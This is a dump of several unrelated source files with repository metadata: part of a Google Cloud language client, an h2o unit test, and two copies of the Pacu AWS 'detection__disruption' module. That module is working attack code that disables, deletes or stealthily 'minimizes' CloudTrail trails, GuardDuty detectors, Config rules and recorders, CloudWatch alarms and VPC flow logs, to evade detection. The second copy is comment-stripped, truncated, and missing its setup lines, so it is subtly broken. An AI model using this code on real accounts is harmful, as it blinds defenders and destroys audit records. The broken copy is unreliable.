default_retry=self._method_configs["AnalyzeEntitySentiment"].retry,
default_timeout=self._method_configs["AnalyzeEntitySentiment"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeEntitySentimentRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_entity_sentiment"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_syntax(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "analyze_syntax" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_syntax"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_syntax,
default_retry=self._method_configs["AnalyzeSyntax"].retry,
default_timeout=self._method_configs["AnalyzeSyntax"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeSyntaxRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_syntax"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def classify_text(
self,
document,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "classify_text" not in self._inner_api_calls:
self._inner_api_calls[
"classify_text"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.classify_text,
default_retry=self._method_configs["ClassifyText"].retry,
default_timeout=self._method_configs["ClassifyText"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.ClassifyTextRequest(document=document)
return self._inner_api_calls["classify_text"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def annotate_text(
self,
document,
features,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "annotate_text" not in self._inner_api_calls:
self._inner_api_calls[
"annotate_text"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.annotate_text,
default_retry=self._method_configs["AnnotateText"].retry,
default_timeout=self._method_configs["AnnotateText"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnnotateTextRequest(
document=document, features=features, encoding_type=encoding_type
)
return self._inner_api_calls["annotate_text"](
request, retry=retry, timeout=timeout, metadata=metadata
)
| true
| true
|
1c447f987b088894b1ea955c47d379681276d285
| 935
|
py
|
Python
|
h2o-py/tests/testdir_munging/pyunit_insert_missing.py
|
kyoren/https-github.com-h2oai-h2o-3
|
77b27109c84c4739f9f1b7a3078f8992beefc813
|
[
"Apache-2.0"
] | 1
|
2016-09-30T05:58:18.000Z
|
2016-09-30T05:58:18.000Z
|
h2o-py/tests/testdir_munging/pyunit_insert_missing.py
|
kyoren/https-github.com-h2oai-h2o-3
|
77b27109c84c4739f9f1b7a3078f8992beefc813
|
[
"Apache-2.0"
] | null | null | null |
h2o-py/tests/testdir_munging/pyunit_insert_missing.py
|
kyoren/https-github.com-h2oai-h2o-3
|
77b27109c84c4739f9f1b7a3078f8992beefc813
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.insert(1, "../../")
import h2o, tests
def insert_missing():
# Connect to a pre-existing cluster
data = [[1, 2, 3, 1, 'a', 1, 9],
[1, 6, 4, 2, 'a', 1, 9],
[2, 3, 8, 6, 'b', 1, 9],
[3, 4, 3, 2, 'b', 3, 8],
[4, 5, 9, 5, 'c', 2, 8],
[5, 7, 10,7, 'b', 8, 8]]
h2o_data = h2o.H2OFrame(python_obj=data)
h2o_data.insert_missing_values(fraction = 0.0)
num_nas = sum([h2o_data[c].isna().sum() for c in range(h2o_data.ncol)])
assert num_nas == 0, "Expected no missing values inserted, but got {0}".format(num_nas)
h2o_data.insert_missing_values(fraction = 1.0)
num_nas = sum([h2o_data[c].isna().sum() for c in range(h2o_data.ncol)])
assert num_nas == h2o_data.nrow*h2o_data.ncol, "Expected all missing values inserted, but got {0}".format(num_nas)
if __name__ == "__main__":
tests.run_test(sys.argv, insert_missing)
| 33.392857
| 118
| 0.581818
|
import sys
sys.path.insert(1, "../../")
import h2o, tests
def insert_missing():
data = [[1, 2, 3, 1, 'a', 1, 9],
[1, 6, 4, 2, 'a', 1, 9],
[2, 3, 8, 6, 'b', 1, 9],
[3, 4, 3, 2, 'b', 3, 8],
[4, 5, 9, 5, 'c', 2, 8],
[5, 7, 10,7, 'b', 8, 8]]
h2o_data = h2o.H2OFrame(python_obj=data)
h2o_data.insert_missing_values(fraction = 0.0)
num_nas = sum([h2o_data[c].isna().sum() for c in range(h2o_data.ncol)])
assert num_nas == 0, "Expected no missing values inserted, but got {0}".format(num_nas)
h2o_data.insert_missing_values(fraction = 1.0)
num_nas = sum([h2o_data[c].isna().sum() for c in range(h2o_data.ncol)])
assert num_nas == h2o_data.nrow*h2o_data.ncol, "Expected all missing values inserted, but got {0}".format(num_nas)
if __name__ == "__main__":
tests.run_test(sys.argv, insert_missing)
| true
| true
|
1c447fa72332939a5d75336dc1a60c443e14a033
| 29,734
|
py
|
Python
|
pacu/modules/detection__disruption/main.py
|
damienjburks/pacu
|
5853f9668a7d78945c40d403bf88a47101ba2b3d
|
[
"BSD-3-Clause"
] | 1
|
2021-12-22T22:39:49.000Z
|
2021-12-22T22:39:49.000Z
|
pacu/modules/detection__disruption/main.py
|
damienjburks/pacu
|
5853f9668a7d78945c40d403bf88a47101ba2b3d
|
[
"BSD-3-Clause"
] | null | null | null |
pacu/modules/detection__disruption/main.py
|
damienjburks/pacu
|
5853f9668a7d78945c40d403bf88a47101ba2b3d
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import argparse
from copy import deepcopy
module_info = {
# Name of the module (should be the same as the filename)
"name": "detection__disruption",
# Name and any other notes about the author
"author": "Spencer Gietzen of Rhino Security Labs",
# Category of the module. Make sure the name matches an existing category.
"category": "EVADE",
# One liner description of the module functionality. This shows up when a user searches for modules.
"one_liner": "Disables, deletes, or minimizes various logging/monitoring services.",
# Full description about what the module does and how it works
"description": "This module will take enumerated CloudTrail trails, GuardDuty detectors, various Config settings, CloudWatch alarms, and VPC flow logs and present you with the option of disabling or deleting each one. For CloudTrail, you also have the option of minimizing it. Minimizing a trail leaves it enabled, but changes all the settings to their very basic level. These changes include: removing the associated SNS topic, disabling global service event logging, disabling multi-regional log collection, disabling log file validation, removing the associated CloudWatch log group/role, and disabling log file encryption. The idea of this is to minimize the amount of logging in the environment without calling dangerous APIs like disable or delete.",
# A list of AWS services that the module utilizes during its execution
"services": [
"GuardDuty",
"CloudTrail",
"EC2",
"Config",
"monitoring",
], # CloudWatch needs to be "monitoring" and VPC needs to be "EC2" here for "ls" to work
# For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
"prerequisite_modules": ["detection__enum_services"],
# Module arguments to autocomplete when the user hits tab
"arguments_to_autocomplete": [
"--trails",
"--detectors",
"--config-rules",
"--config-recorders",
"--config-aggregators",
"--alarms",
"--flow-logs",
],
}
parser = argparse.ArgumentParser(add_help=False, description=module_info["description"])
parser.add_argument(
"--trails",
required=False,
default=None,
help="Comma-separated list of CloudTrail trail names and regions to target instead of enumerating them. They should be formatted like trail_name@region.",
)
parser.add_argument(
"--detectors",
required=False,
default=None,
help="Comma-separated list of GuardDuty detector IDs and regions to target, instead of enumerating them. They should be formatted like detector_id@region.",
)
parser.add_argument(
"--config-rules",
required=False,
default=None,
help="Comma-separated list of Config rule names and regions to target, instead of enumerating them. They should be formatted like rule_name@region.",
)
parser.add_argument(
"--config-recorders",
required=False,
default=None,
help="Comma-separated list of Config configuration recorder names and regions to target, instead of enumerating them. They should be formatted like recorder_name@region.",
)
parser.add_argument(
"--config-aggregators",
required=False,
default=None,
help="Comma-separated list of Config configuration aggregator names and regions to target, instead of enumerating them. They should be formatted like aggregator_name@region.",
)
parser.add_argument(
"--alarms",
required=False,
default=None,
help="Comma-separated list of CloudWatch alarm names and regions to target, instead of enumerating them. They should be formatted like alarm_name@region.",
)
parser.add_argument(
"--flow-logs",
required=False,
default=None,
help="Comma-separated list of VPC Flow Log IDs and regions to target, instead of enumerating them. They should be formatted like log_id@region.",
)
def main(args, pacu_main):
session = pacu_main.get_active_session()
###### Don't modify these. They can be removed if you are not using the function.
args = parser.parse_args(args)
print = pacu_main.print
input = pacu_main.input
fetch_data = pacu_main.fetch_data
get_regions = pacu_main.get_regions
######
gd_regions = get_regions("guardduty")
ct_regions = get_regions("cloudtrail")
config_regions = get_regions("config")
cw_regions = get_regions("monitoring")
vpc_regions = get_regions("ec2")
trails = []
detectors = []
rules = []
recorders = []
aggregators = []
alarms = []
flow_logs = []
summary_data = {}
# If any arguments are passed in, that that means to not check the database
# to see if we need to enumerate stuff
if any(
[
args.alarms,
args.trails,
args.flow_logs,
args.detectors,
args.config_rules,
args.config_recorders,
args.config_aggregators,
]
):
if args.trails is not None:
ct_regions = set()
for trail in args.trails.split(","):
name, region = trail.split("@")
trails.append({"Name": name, "Region": region})
ct_regions.add(region)
if args.detectors is not None:
gd_regions = set()
for detector in args.detectors.split(","):
id, region = detector.split("@")
detectors.append({"Id": id, "Region": region})
gd_regions.add(region)
tmp_config_regions = set()
if args.config_rules is not None:
for rule in args.config_rules.split(","):
name, region = rule.split("@")
rules.append({"ConfigRuleName": name, "Region": region})
tmp_config_regions.add(region)
if args.config_recorders is not None:
for recorder in args.config_records.split(","):
name, region = recorder.split("@")
recorders.append({"name": name, "Region": region})
tmp_config_regions.add(region)
if args.config_aggregators is not None:
for aggregator in args.config_aggregators.split(","):
name, region = aggregator.split("@")
aggregators.append(
{"ConfigurationAggregatorName": name, "Region": region}
)
tmp_config_regions.add(region)
if len(tmp_config_regions) > 0:
config_regions = tmp_config_regions
if args.alarms is not None:
cw_regions = set()
for alarm in args.alarms.split(","):
name, region = alarm.split("@")
alarms.append({"AlarmName": name, "Region": region})
cw_regions.add(region)
if args.flow_logs is not None:
vpc_regions = set()
for log in args.flow_logs.split(","):
id, region = log.split("@")
flow_logs.append({"FlowLogId": id, "Region": region})
vpc_regions.add(region)
else:
# No arguments passed in, so disrupt everything. We need to
# figure out what data from enum_monitoring is missing, so
# that multiple calls are not required. This is done by
# building an argument string after checking the DB.
arguments = []
cloudtrail_data = deepcopy(session.CloudTrail)
guardduty_data = deepcopy(session.GuardDuty)
config_data = deepcopy(session.Config)
vpc_data = deepcopy(session.VPC)
cloudwatch_data = deepcopy(session.CloudWatch)
if "Trails" not in cloudtrail_data:
arguments.append("--cloud-trail")
else:
trails = cloudtrail_data["Trails"]
if "Detectors" not in guardduty_data:
arguments.append("--guard-duty")
else:
detectors = guardduty_data["Detectors"]
# If Rules isn't in there, then none of the other stuff has been enumerated either
if "Rules" not in config_data:
arguments.append("--config")
else:
rules = config_data["Rules"]
recorders = config_data["Recorders"]
aggregators = config_data["Aggregators"]
if "Alarms" not in cloudwatch_data:
arguments.append("--cloud-watch")
else:
alarms = cloudwatch_data["Alarms"]
if "FlowLogs" not in vpc_data:
arguments.append("--vpc")
else:
flow_logs = vpc_data["FlowLogs"]
# If there is missing data, run enum_monitoring
if len(arguments) > 0:
if (
fetch_data(
["Logging/Monitoring Data"],
module_info["prerequisite_modules"][0],
" ".join(arguments),
)
is False
):
print(
"Pre-req module not run successfully. Only targeting services that currently have valid data...\n"
)
else:
trails = deepcopy(session.CloudTrail["Trails"])
detectors = deepcopy(session.GuardDuty["Detectors"])
rules = deepcopy(session.Config["Rules"])
recorders = deepcopy(session.Config["Recorders"])
aggregators = deepcopy(session.Config["Aggregators"])
alarms = deepcopy(session.CloudWatch["Alarms"])
flow_logs = deepcopy(session.VPC["FlowLogs"])
if len(detectors) > 0:
print("Starting GuardDuty...\n")
summary_data["guardduty"] = {
"disabled": 0,
"deleted": 0,
}
for region in gd_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("guardduty", region)
for detector in detectors:
if detector["Region"] == region:
action = (
input(
" GuardDuty detector ID: {}\n Do you want to disable (dis), delete (del), or skip (s) it? (dis/del/s) ".format(
detector["Id"]
)
)
.strip()
.lower()
)
if action == "dis":
try:
client.update_detector(
DetectorId=detector["Id"], Enable=False
)
print(
" Successfully disabled detector {}!\n".format(
detector["Id"]
)
)
summary_data["guardduty"]["disabled"] += 1
except Exception as error:
print(
" Could not disable detector {}:\n {}\n".format(
detector["Id"], error
)
)
elif action == "del":
try:
client.delete_detector(DetectorId=detector["Id"])
print(
" Successfully deleted detector {}!\n".format(
detector["Id"]
)
)
summary_data["guardduty"]["deleted"] += 1
except Exception as error:
print(
" Could not delete detector {}:\n {}\n".format(
detector["Id"], error
)
)
else:
print(" Skipping detector {}...\n".format(detector["Id"]))
print("GuardDuty finished.\n")
else:
print("No detectors found. Skipping GuardDuty...\n")
if len(trails) > 0:
print("Starting CloudTrail...\n")
summary_data["cloudtrail"] = {
"disabled": 0,
"deleted": 0,
"minimized": 0,
}
for region in ct_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("cloudtrail", region)
for trail in trails:
if trail["Region"] == region:
action = (
input(
" CloudTrail trail name: {}\n Do you want to disable (dis), delete (del), minimize (m), or skip (s) it? (dis/del/m/s) ".format(
trail["Name"]
)
)
.strip()
.lower()
)
if action == "dis":
try:
client.stop_logging(Name=trail["Name"])
print(
" Successfully disabled trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["disabled"] += 1
except Exception as error:
print(
" Could not disable trail {}:\n {}\n".format(
trail["Name"], error
)
)
elif action == "del":
try:
client.delete_trail(Name=trail["Name"])
print(
" Successfully deleted trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["deleted"] += 1
except Exception as error:
print(
" Could not delete trail {}:\n {}\n".format(
trail["Name"], error
)
)
elif action == "m":
try:
client.update_trail(
Name=trail["Name"],
SnsTopicName="",
IncludeGlobalServiceEvents=False,
IsMultiRegionTrail=False,
EnableLogFileValidation=False,
CloudWatchLogsLogGroupArn="",
CloudWatchLogsRoleArn="",
KmsKeyId="",
)
print(
" Successfully minimized trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["minimized"] += 1
except Exception as error:
print(
" Could not minimize trail {}:\n {}\n".format(
trail["Name"], error
)
)
else:
print(" Skipping trail {}...\n".format(trail["Name"]))
print("CloudTrail finished.\n")
else:
print("No trails found. Skipping CloudTrail...\n")
if len(rules) > 0:
print("Starting Config rules...\n")
summary_data["awsconfig"] = {
"rules": {
"deleted": 0,
},
"recorders": {
"deleted": 0,
"stopped": 0,
},
"aggregators": {
"deleted": 0,
},
}
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for rule in rules:
if rule["Region"] == region:
action = (
input(
" Rule Name: {}\n Do you want to delete this rule? (y/n) ".format(
rule["ConfigRuleName"]
)
)
.strip()
.lower()
)
if action == "y":
try:
client.delete_config_rule(
ConfigRuleName=rule["ConfigRuleName"]
)
print(
" Successfully deleted rule {}!\n".format(
rule["ConfigRuleName"]
)
)
summary_data["awsconfig"]["rules"]["deleted"] += 1
except Exception as error:
print(
" Could not delete rule {}:\n {}\n".format(
rule["ConfigRuleName"], error
)
)
else:
print(
" Skipping rule {}...\n".format(
rule["ConfigRuleName"]
)
)
print("Config rules finished.\n")
else:
print("No rules found. Skipping Config rules...\n")
if len(recorders) > 0:
print("Starting Config recorders...\n")
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for recorder in recorders:
if recorder["Region"] == region:
action = (
input(
" Recorder Name: {}\n Do you want to stop (stop), delete (del), or skip (skip) this recorder? (stop/del/skip) ".format(
recorder["name"]
)
)
.strip()
.lower()
)
if action == "del":
try:
client.delete_configuration_recorder(
ConfigurationRecorderName=recorder["name"]
)
print(
" Successfully deleted recorder {}!\n".format(
recorder["name"]
)
)
summary_data["awsconfig"]["recorders"]["deleted"] += 1
except Exception as error:
print(
" Could not delete recorder {}:\n {}\n".format(
recorder["name"], error
)
)
elif action == "stop":
try:
client.stop_configuration_recorder(
ConfigurationRecorderName=recorder["name"]
)
print(
" Successfully stopped recorder {}!\n".format(
recorder["name"]
)
)
summary_data["awsconfig"]["recorders"]["stopped"] += 1
except Exception as error:
print(
" Could not stop recorder {}:\n {}\n".format(
recorder["name"], error
)
)
else:
print(
" Skipping recorder {}...\n".format(recorder["name"])
)
print("Config recorders finished.\n")
else:
print("No recorders found. Skipping Config recorders...\n")
if len(aggregators) > 0:
print("Starting Config aggregators...\n")
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for aggregator in aggregators:
if aggregator["Region"] == region:
action = (
input(
" Aggregator Name: {}\n Do you want to delete this aggregator? (y/n) ".format(
aggregator["ConfigurationAggregatorName"]
)
)
.strip()
.lower()
)
if action == "y":
try:
client.delete_configuration_aggregator(
ConfigurationAggregatorName=aggregator[
"ConfigurationAggregatorName"
]
)
print(
" Successfully deleted aggregator {}!\n".format(
aggregator["ConfigurationAggregatorName"]
)
)
summary_data["awsconfig"]["aggregators"]["deleted"] += 1
except Exception as error:
print(
" Could not delete aggregator {}:\n {}\n".format(
aggregator["ConfigurationAggregatorName"], error
)
)
else:
print(
" Skipping aggregator {}...\n".format(
aggregator["ConfigurationAggregatorName"]
)
)
print("Config aggregators finished.\n")
else:
print("No aggregators found. Skipping Config aggregators...\n")
if len(alarms) > 0:
print("Starting CloudWatch alarms...\n")
summary_data["cloudwatch"] = {
"deleted": 0,
"disabled": 0,
}
for region in cw_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("cloudwatch", region)
for alarm in alarms:
if alarm["Region"] == region:
action = (
input(
" Alarm Name: {}\n Do you want to disable the associated actions (dis), delete (del), or skip (s) this alarm? (dis/del/s) ".format(
alarm["AlarmName"]
)
)
.strip()
.lower()
)
if action == "del":
try:
# delete_alarms can take multiple alarm names in one request,
# but if there are ANY errors, no alarms are deleted, so I
# chose to do one at a time here
client.delete_alarms(AlarmNames=[alarm["AlarmName"]])
print(
" Successfully deleted alarm {}!\n".format(
alarm["AlarmName"]
)
)
summary_data["cloudwatch"]["deleted"] += 1
except Exception as error:
print(
" Could not delete alarm {}:\n {}\n".format(
alarm["AlarmName"], error
)
)
elif action == "dis":
try:
client.disable_alarm_actions(
AlarmNames=[alarm["AlarmName"]]
)
print(
" Successfully disabled actions for alarm {}!\n".format(
alarm["AlarmName"]
)
)
summary_data["cloudwatch"]["disabled"] += 1
except Exception as error:
print(
" Could not disable actions for alarm {}:\n {}\n".format(
alarm["AlarmName"], error
)
)
else:
print(
" Skipping alarm {}...\n".format(alarm["AlarmName"])
)
print("CloudWatch alarms finished.\n")
else:
print("No alarms found. Skipping CloudWatch...\n")
if len(flow_logs) > 0:
print("Starting VPC flow logs...\n")
summary_data["vpc"] = {"deleted": 0}
for region in vpc_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("ec2", region)
logs_to_delete = []
for log in flow_logs:
if log["Region"] == region:
action = (
input(
" Flow Log ID: {}\n Do you want to delete this flow log? (y/n) ".format(
log["FlowLogId"]
)
)
.strip()
.lower()
)
if action == "y":
logs_to_delete.append(log["FlowLogId"])
print(
" Added flow log {} to list of logs to delete.".format(
log["FlowLogId"]
)
)
else:
print(
" Skipping flow log {}...\n".format(log["FlowLogId"])
)
# We can batch delete these and not worry about any fails, as it will do as much as it can, unlike above
try:
response = client.delete_flow_logs(FlowLogIds=logs_to_delete)
print(
" Attempt to delete all flow logs succeeded. Read the output for more information on any fails:\n {}\n".format(
response
)
)
summary_data["vpc"]["deleted"] += len(logs_to_delete) - len(
response["Unsuccessful"]
)
except Exception as error:
print(
" Attempt to delete flow logs failed:\n {}\n".format(
error
)
)
print("VPC flow logs finished.\n")
else:
print("No flow logs found. Skipping VPC...\n")
return summary_data
def summary(data, pacu_main):
out = ""
if "guardduty" in data:
out += " GuardDuty:\n"
out += " {} detector(s) disabled.\n".format(data["guardduty"]["disabled"])
out += " {} detector(s) deleted.\n".format(data["guardduty"]["deleted"])
if "cloudtrail" in data:
out += " CloudTrail:\n"
out += " {} trail(s) disabled.\n".format(data["cloudtrail"]["disabled"])
out += " {} trail(s) deleted.\n".format(data["cloudtrail"]["deleted"])
out += " {} trail(s) minimized.\n".format(data["cloudtrail"]["minimized"])
if "awsconfig" in data:
out += " AWSConfig:\n"
out += " Rules:\n"
out += " {} rule(s) deleted.\n".format(
data["awsconfig"]["rules"]["deleted"]
)
out += " Recorders:\n"
out += " {} recorder(s) deleted.\n".format(
data["awsconfig"]["recorders"]["deleted"]
)
out += " {} recorder(s) stopped.\n".format(
data["awsconfig"]["recorders"]["stopped"]
)
out += " Aggregators:\n"
out += " {} aggregator(s) deleted.\n".format(
data["awsconfig"]["aggregators"]["deleted"]
)
if "vpc" in data:
out += " VPC:\n"
out += " {} flow log(s) deleted.\n".format(data["vpc"]["deleted"])
return out
| 41.997175
| 760
| 0.438723
|
import argparse
from copy import deepcopy
module_info = {
"name": "detection__disruption",
"author": "Spencer Gietzen of Rhino Security Labs",
"category": "EVADE",
"one_liner": "Disables, deletes, or minimizes various logging/monitoring services.",
"description": "This module will take enumerated CloudTrail trails, GuardDuty detectors, various Config settings, CloudWatch alarms, and VPC flow logs and present you with the option of disabling or deleting each one. For CloudTrail, you also have the option of minimizing it. Minimizing a trail leaves it enabled, but changes all the settings to their very basic level. These changes include: removing the associated SNS topic, disabling global service event logging, disabling multi-regional log collection, disabling log file validation, removing the associated CloudWatch log group/role, and disabling log file encryption. The idea of this is to minimize the amount of logging in the environment without calling dangerous APIs like disable or delete.",
"services": [
"GuardDuty",
"CloudTrail",
"EC2",
"Config",
"monitoring",
],
"prerequisite_modules": ["detection__enum_services"],
"arguments_to_autocomplete": [
"--trails",
"--detectors",
"--config-rules",
"--config-recorders",
"--config-aggregators",
"--alarms",
"--flow-logs",
],
}
parser = argparse.ArgumentParser(add_help=False, description=module_info["description"])
parser.add_argument(
"--trails",
required=False,
default=None,
help="Comma-separated list of CloudTrail trail names and regions to target instead of enumerating them. They should be formatted like trail_name@region.",
)
parser.add_argument(
"--detectors",
required=False,
default=None,
help="Comma-separated list of GuardDuty detector IDs and regions to target, instead of enumerating them. They should be formatted like detector_id@region.",
)
parser.add_argument(
"--config-rules",
required=False,
default=None,
help="Comma-separated list of Config rule names and regions to target, instead of enumerating them. They should be formatted like rule_name@region.",
)
parser.add_argument(
"--config-recorders",
required=False,
default=None,
help="Comma-separated list of Config configuration recorder names and regions to target, instead of enumerating them. They should be formatted like recorder_name@region.",
)
parser.add_argument(
"--config-aggregators",
required=False,
default=None,
help="Comma-separated list of Config configuration aggregator names and regions to target, instead of enumerating them. They should be formatted like aggregator_name@region.",
)
parser.add_argument(
"--alarms",
required=False,
default=None,
help="Comma-separated list of CloudWatch alarm names and regions to target, instead of enumerating them. They should be formatted like alarm_name@region.",
)
parser.add_argument(
"--flow-logs",
required=False,
default=None,
help="Comma-separated list of VPC Flow Log IDs and regions to target, instead of enumerating them. They should be formatted like log_id@region.",
)
def main(args, pacu_main):
session = pacu_main.get_active_session()
trails = []
detectors = []
rules = []
recorders = []
aggregators = []
alarms = []
flow_logs = []
summary_data = {}
# If any arguments are passed in, that that means to not check the database
# to see if we need to enumerate stuff
if any(
[
args.alarms,
args.trails,
args.flow_logs,
args.detectors,
args.config_rules,
args.config_recorders,
args.config_aggregators,
]
):
if args.trails is not None:
ct_regions = set()
for trail in args.trails.split(","):
name, region = trail.split("@")
trails.append({"Name": name, "Region": region})
ct_regions.add(region)
if args.detectors is not None:
gd_regions = set()
for detector in args.detectors.split(","):
id, region = detector.split("@")
detectors.append({"Id": id, "Region": region})
gd_regions.add(region)
tmp_config_regions = set()
if args.config_rules is not None:
for rule in args.config_rules.split(","):
name, region = rule.split("@")
rules.append({"ConfigRuleName": name, "Region": region})
tmp_config_regions.add(region)
if args.config_recorders is not None:
for recorder in args.config_records.split(","):
name, region = recorder.split("@")
recorders.append({"name": name, "Region": region})
tmp_config_regions.add(region)
if args.config_aggregators is not None:
for aggregator in args.config_aggregators.split(","):
name, region = aggregator.split("@")
aggregators.append(
{"ConfigurationAggregatorName": name, "Region": region}
)
tmp_config_regions.add(region)
if len(tmp_config_regions) > 0:
config_regions = tmp_config_regions
if args.alarms is not None:
cw_regions = set()
for alarm in args.alarms.split(","):
name, region = alarm.split("@")
alarms.append({"AlarmName": name, "Region": region})
cw_regions.add(region)
if args.flow_logs is not None:
vpc_regions = set()
for log in args.flow_logs.split(","):
id, region = log.split("@")
flow_logs.append({"FlowLogId": id, "Region": region})
vpc_regions.add(region)
else:
# No arguments passed in, so disrupt everything. We need to
# figure out what data from enum_monitoring is missing, so
# that multiple calls are not required. This is done by
# building an argument string after checking the DB.
arguments = []
cloudtrail_data = deepcopy(session.CloudTrail)
guardduty_data = deepcopy(session.GuardDuty)
config_data = deepcopy(session.Config)
vpc_data = deepcopy(session.VPC)
cloudwatch_data = deepcopy(session.CloudWatch)
if "Trails" not in cloudtrail_data:
arguments.append("--cloud-trail")
else:
trails = cloudtrail_data["Trails"]
if "Detectors" not in guardduty_data:
arguments.append("--guard-duty")
else:
detectors = guardduty_data["Detectors"]
# If Rules isn't in there, then none of the other stuff has been enumerated either
if "Rules" not in config_data:
arguments.append("--config")
else:
rules = config_data["Rules"]
recorders = config_data["Recorders"]
aggregators = config_data["Aggregators"]
if "Alarms" not in cloudwatch_data:
arguments.append("--cloud-watch")
else:
alarms = cloudwatch_data["Alarms"]
if "FlowLogs" not in vpc_data:
arguments.append("--vpc")
else:
flow_logs = vpc_data["FlowLogs"]
if len(arguments) > 0:
if (
fetch_data(
["Logging/Monitoring Data"],
module_info["prerequisite_modules"][0],
" ".join(arguments),
)
is False
):
print(
"Pre-req module not run successfully. Only targeting services that currently have valid data...\n"
)
else:
trails = deepcopy(session.CloudTrail["Trails"])
detectors = deepcopy(session.GuardDuty["Detectors"])
rules = deepcopy(session.Config["Rules"])
recorders = deepcopy(session.Config["Recorders"])
aggregators = deepcopy(session.Config["Aggregators"])
alarms = deepcopy(session.CloudWatch["Alarms"])
flow_logs = deepcopy(session.VPC["FlowLogs"])
if len(detectors) > 0:
print("Starting GuardDuty...\n")
summary_data["guardduty"] = {
"disabled": 0,
"deleted": 0,
}
for region in gd_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("guardduty", region)
for detector in detectors:
if detector["Region"] == region:
action = (
input(
" GuardDuty detector ID: {}\n Do you want to disable (dis), delete (del), or skip (s) it? (dis/del/s) ".format(
detector["Id"]
)
)
.strip()
.lower()
)
if action == "dis":
try:
client.update_detector(
DetectorId=detector["Id"], Enable=False
)
print(
" Successfully disabled detector {}!\n".format(
detector["Id"]
)
)
summary_data["guardduty"]["disabled"] += 1
except Exception as error:
print(
" Could not disable detector {}:\n {}\n".format(
detector["Id"], error
)
)
elif action == "del":
try:
client.delete_detector(DetectorId=detector["Id"])
print(
" Successfully deleted detector {}!\n".format(
detector["Id"]
)
)
summary_data["guardduty"]["deleted"] += 1
except Exception as error:
print(
" Could not delete detector {}:\n {}\n".format(
detector["Id"], error
)
)
else:
print(" Skipping detector {}...\n".format(detector["Id"]))
print("GuardDuty finished.\n")
else:
print("No detectors found. Skipping GuardDuty...\n")
if len(trails) > 0:
print("Starting CloudTrail...\n")
summary_data["cloudtrail"] = {
"disabled": 0,
"deleted": 0,
"minimized": 0,
}
for region in ct_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("cloudtrail", region)
for trail in trails:
if trail["Region"] == region:
action = (
input(
" CloudTrail trail name: {}\n Do you want to disable (dis), delete (del), minimize (m), or skip (s) it? (dis/del/m/s) ".format(
trail["Name"]
)
)
.strip()
.lower()
)
if action == "dis":
try:
client.stop_logging(Name=trail["Name"])
print(
" Successfully disabled trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["disabled"] += 1
except Exception as error:
print(
" Could not disable trail {}:\n {}\n".format(
trail["Name"], error
)
)
elif action == "del":
try:
client.delete_trail(Name=trail["Name"])
print(
" Successfully deleted trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["deleted"] += 1
except Exception as error:
print(
" Could not delete trail {}:\n {}\n".format(
trail["Name"], error
)
)
elif action == "m":
try:
client.update_trail(
Name=trail["Name"],
SnsTopicName="",
IncludeGlobalServiceEvents=False,
IsMultiRegionTrail=False,
EnableLogFileValidation=False,
CloudWatchLogsLogGroupArn="",
CloudWatchLogsRoleArn="",
KmsKeyId="",
)
print(
" Successfully minimized trail {}!\n".format(
trail["Name"]
)
)
summary_data["cloudtrail"]["minimized"] += 1
except Exception as error:
print(
" Could not minimize trail {}:\n {}\n".format(
trail["Name"], error
)
)
else:
print(" Skipping trail {}...\n".format(trail["Name"]))
print("CloudTrail finished.\n")
else:
print("No trails found. Skipping CloudTrail...\n")
if len(rules) > 0:
print("Starting Config rules...\n")
summary_data["awsconfig"] = {
"rules": {
"deleted": 0,
},
"recorders": {
"deleted": 0,
"stopped": 0,
},
"aggregators": {
"deleted": 0,
},
}
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for rule in rules:
if rule["Region"] == region:
action = (
input(
" Rule Name: {}\n Do you want to delete this rule? (y/n) ".format(
rule["ConfigRuleName"]
)
)
.strip()
.lower()
)
if action == "y":
try:
client.delete_config_rule(
ConfigRuleName=rule["ConfigRuleName"]
)
print(
" Successfully deleted rule {}!\n".format(
rule["ConfigRuleName"]
)
)
summary_data["awsconfig"]["rules"]["deleted"] += 1
except Exception as error:
print(
" Could not delete rule {}:\n {}\n".format(
rule["ConfigRuleName"], error
)
)
else:
print(
" Skipping rule {}...\n".format(
rule["ConfigRuleName"]
)
)
print("Config rules finished.\n")
else:
